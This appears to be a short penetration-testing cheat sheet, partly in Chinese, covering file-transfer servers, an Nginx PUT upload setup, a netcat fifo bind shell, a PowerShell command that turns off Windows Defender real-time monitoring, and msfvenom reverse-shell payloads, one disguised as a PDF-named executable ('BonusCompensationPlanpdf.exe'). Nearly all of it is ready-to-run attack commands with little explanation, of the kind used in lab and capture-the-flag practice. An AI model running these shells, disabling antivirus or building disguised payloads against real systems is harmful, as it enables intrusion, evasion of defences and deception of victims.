Web
Basic
1
2
3
4
5
6
| php -S 0.0.0.0:port
python3 -m http.server [port] # 默认端口为 8000
ruby -run -e httpd . [-p port] # 默认端口为 8080
# wget http://ip/file
# curl -O http://ip/file
|
Nginx PUT
1
2
| sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
|
/etc/nginx/sites-available/upload.conf
1
2
3
4
5
6
7
8
| server {
listen 9001;
location /SecretUploadDirectory/ {
root /var/www/uploads;
dav_methods PUT;
}
}
|
链接到sites-enabled目录下
1
| sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
|
启动服务
Read More
Bind Shells
1
| rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
|
1
2
| nc -nv 10.129.41.200 7777
Target@server:~$
|
Reverse Shells
禁用 Windows Defender antivirus(AV) 命令
1
| PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true
|
msfvenom
1
2
3
4
| msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
# or
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
...
|
Online - Reverse Shell Generator https://www.revshells.com/
Read More